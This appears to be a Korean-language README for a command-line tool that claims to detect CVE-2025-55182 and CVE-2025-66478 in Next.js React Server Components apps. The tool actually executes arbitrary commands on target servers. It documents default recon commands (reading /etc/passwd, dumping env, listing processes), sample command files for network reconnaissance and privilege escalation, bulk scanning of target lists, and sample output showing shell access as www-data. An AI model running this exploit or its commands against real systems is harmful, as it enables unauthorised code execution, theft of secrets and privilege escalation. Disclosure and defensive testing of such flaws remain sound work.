
React Server Components를 사용하는 Next.js 애플리케이션에서 CVE-2025-55182 및 CVE-2025-66478을 탐지하는 명령줄 도구입니다.
React Server Components를 사용하는 Next.js 애플리케이션에서 CVE-2025-55182 및 CVE-2025-66478을 탐지하기 위한 명령줄 도구입니다.
wget -q -O /usr/bin/CVE-2025-55182 https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/CVE-2025-55182 && chmod +x /usr/bin/CVE-2025-55182
wget -q -O /usr/bin/reportgenerator https://raw.githubusercontent.com/rix4uni/CVE-2025-55182/refs/heads/main/reportgenerator && chmod +x /usr/bin/reportgenerator
CVE-2025-55182 -d https://example.com
| 옵션 | 설명 | 기본값 |
|---|---|---|
-d, --domain | 대상 URL (프로토콜이 없으면 https:// 자동 추가) | http://localhost:3000 |
-c, --command | 실행할 단일 명령 | - |
-m, --multiple | 세미콜론으로 구분된 여러 명령 | - |
-f, --file | 명령이 포함된 파일 (한 줄에 하나씩) | - |
-h, --help | 도움말 메시지 표시 | - |
참고: 명령 옵션이 제공되지 않으면 기본 명령이 실행됩니다.
이 도구는 기본적으로 다음 명령을 실행합니다:
cat /etc/os-release - OS 정보whoami - 현재 사용자pwd - 현재 작업 디렉터리id - 사용자 ID 및 그룹uname -a - 시스템 정보hostname -I - 네트워크 인터페이스ls -la - 디렉터리 목록cat /etc/passwd - 사용자 계정env - 환경 변수ps aux - 실행 중인 프로세스reportgenerator 도구는 스캔 결과에서 전문적인 취약점 공개 보고서를 자동으로 생성합니다.
# 대상 도메인이 포함된 파일 생성
echo -e "https://target1.com\nhttps://target2.com" > subs.txt
# 보고서 생성기 실행
reportgenerator
| 플래그 | 설명 | 기본값 |
|---|---|---|
--file | 대상 도메인이 포함된 입력 파일 | subs.txt |
--user | 공개 섹션의 연구원 이름 | Bhagirath Saxena |
# 기본 설정 사용 (subs.txt, Bhagirath Saxena)
reportgenerator
# 사용자 지정 대상 파일 사용
reportgenerator --file targets.txt
# 사용자 지정 연구원 이름 사용
reportgenerator --user "John Doe"
# 두 옵션 모두 사용
reportgenerator --file my-targets.txt --user "Jane Smith"
보고서는 두 개의 디렉터리에 생성됩니다:
textfile/ - 원시 스캔 출력 (번호 매겨짐: 1.txt, 2.txt 등)mdfile/ - 전문 마크다운 보고서 (번호 매겨짐: 1.md, 2.md 등)참고: 자동 번호 매기기 기능은 기존 보고서가 절대 덮어쓰여지지 않도록 보장합니다. 새 스캔은 가장 높은 기존 번호부터 계속됩니다.
생성된 각 보고서에는 다음이 포함됩니다:
▼ 🎯 대상: https://vulnerable-app.com
▼ 📋 실행할 명령: 10
• cat /etc/os-release
• whoami
• pwd
• id
• uname -a
• hostname -I
• ls -la
• cat /etc/passwd
• env
• ps aux
[1/10] 실행 중: cat /etc/os-release
▼ 💻 OS 정보
║ NAME="Ubuntu"
║ VERSION="22.04.3 LTS (Jammy Jellyfish)"
║ ID=ubuntu
║ ID_LIKE=debian
║ PRETTY_NAME="Ubuntu 22.04.3 LTS"
║ ...
[2/10] 실행 중: whoami
▼ 👤 현재 사용자
║ www-data
...
[3/10] 실행 중: pwd
▼ 📂 현재 디렉터리
║ /var/www/html
...
[6/10] 실행 중: hostname -I
╔════════════════════════════════════════════════════════════╗
║ 명령 실패: hostname -I
║ 이 명령을 사용할 수 없거나 서버에서 거부했습니다
╚════════════════════════════════════════════════════════════╝
[!] 대체 네트워크 명령 시도 중...
▼ 🌐 네트워크 인터페이스 (대체)
║ 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
║ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
║ inet 127.0.0.1/8 scope host lo
║ valid_lft forever preferred_lft forever
...
commands/ 디렉토리 예시:다양한 시나리오에 대한 샘플 명령 파일을 생성합니다:
# commands/basic-recon.txt
whoami
id
uname -a
cat /etc/os-release
hostname
# commands/network-recon.txt
ifconfig
netstat -tulpn
iptables -L
cat /etc/hosts
cat /etc/resolv.conf
# commands/privilege-escalation.txt
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/sudoers
ls -la /root/